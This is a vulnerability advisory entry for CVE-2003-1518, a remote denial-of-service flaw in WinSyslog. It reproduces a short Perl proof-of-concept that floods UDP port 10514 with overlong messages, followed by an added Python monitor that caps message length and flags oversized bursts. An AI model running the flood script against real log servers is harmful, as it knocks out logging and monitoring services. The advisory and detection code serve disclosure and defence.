WinSyslog Overlong Syslog Message Remote Denial-of-Service Vulnerability


Vulnerability ID: 1107512
Vulnerability type: Buffer overflow
Published: 2003-10-14
Updated: 2003-12-31
CVE ID: CVE-2003-1518
CNNVD-ID: CNNVD-200312-381
Platform: Windows
CVSS score: 7.8
|Vulnerability source
https://www.exploit-db.com/exploits/23242
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-381
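|Vulnerability details
WinSyslog is a syslog logging service program for Windows. WinSyslog does not correctly handle overlong syslog messages, and a remote attacker can exploit this vulnerability to carry out a denial-of-service attack against the log server. When the program receives multiple overlong syslog messages on its listening port (10514/UDP by default), WinSyslog can stop responding.
|Exploit (EXP)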
source: http://www.securityfocus.com/bid/8821/info

WinSyslog is prone to a remotely exploitable denial of service vulnerability. The issue exists in the Interactive Syslog Server specifically. This occurs when the program receives multiple excessive syslog messages via the port it listens on (10514/UDP by default). This is also reported to cause system instability, which is likely due to resource exhaustion.

The issue does not affect the WinSyslog or MonitorWare agent services. This issue affects versions of WinSyslog prior to 2003-09-15. The vendor has released hot fixes for the MonitorWare Agent product, which also includes the vulnerable component. 

#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count++)
{
    $buf = "";
    $buf .= "A" x ((600 + $count) * 4);

    print "Length: ", length($buf), "\n";
    send($socket, $buf, 0, $portaddr);
    print "sent\n";
}

print "Done\n";
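
A receiver-side check for the condition described above, added here as an example and not taken from the original advisory or from the vendor's code: it caps every syslog message at the 1024-byte limit of RFC 3164 and flags a source that sends a burst of overlong datagrams. The class name, the threshold and window values, and the sample addresses and traffic are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

MAX_SYSLOG_LEN = 1024   # RFC 3164 section 4.1: a syslog packet must be 1024 bytes or less
BURST_THRESHOLD = 5     # assumption: oversized datagrams per source before alerting
WINDOW_SECONDS = 10.0   # assumption: sliding window used for counting them


class OversizeSyslogMonitor:
    """Bound each message and flag sources sending bursts of overlong ones."""

    def __init__(self, max_len=MAX_SYSLOG_LEN, threshold=BURST_THRESHOLD,
                 window=WINDOW_SECONDS):
        self.max_len = max_len
        self.threshold = threshold
        self.window = window
        self._oversized = defaultdict(deque)   # source IP -> recent timestamps
        self.alerted = set()                   # sources already reported

    def handle(self, ts, src, payload):
        """Return (text_to_log, alert_or_None); overlong payloads are truncated."""
        alert = None
        if len(payload) > self.max_len:
            q = self._oversized[src]
            q.append(ts)
            while q and ts - q[0] > self.window:   # drop entries outside the window
                q.popleft()
            if len(q) >= self.threshold and src not in self.alerted:
                self.alerted.add(src)
                alert = (f"{src}: {len(q)} syslog datagrams over "
                         f"{self.max_len} bytes within {self.window:.0f}s")
            payload = payload[:self.max_len]       # never keep more than the cap
        return payload.decode("ascii", "replace"), alert


def run_constructed_sample():
    """Constructed traffic: one normal sender and one sending growing overlong messages."""
    mon = OversizeSyslogMonitor()
    alerts = []
    events = [(0.0, "10.0.0.5", b"<34>Oct 11 22:14:15 host su: ok")]
    events += [(1.0 + i * 0.1, "10.0.0.9", b"A" * ((600 + i) * 4)) for i in range(8)]
    for ts, src, payload in events:
        msg, alert = mon.handle(ts, src, payload)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    print(run_constructed_sample())
```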
|References

Source: BID
Name: 8821
Link: http://www.securityfocus.com/bid/8821
Source: XF
Name: winsyslog-long-syslog-dos(13428)
Link: http://xforce.iss.net/xforce/xfdb/13428
Source: www.securiteam.com
Link: http://www.securiteam.com/windowsntfocus/6L00F158KE.html
Source: www.adiscon.com
Link: http://www.adiscon.com/Common/en/advisory/2003-09-15.asp
Source: NSFOCUS
Name: 5549
Link: http://www.nsfocus.net/vulndb/5549
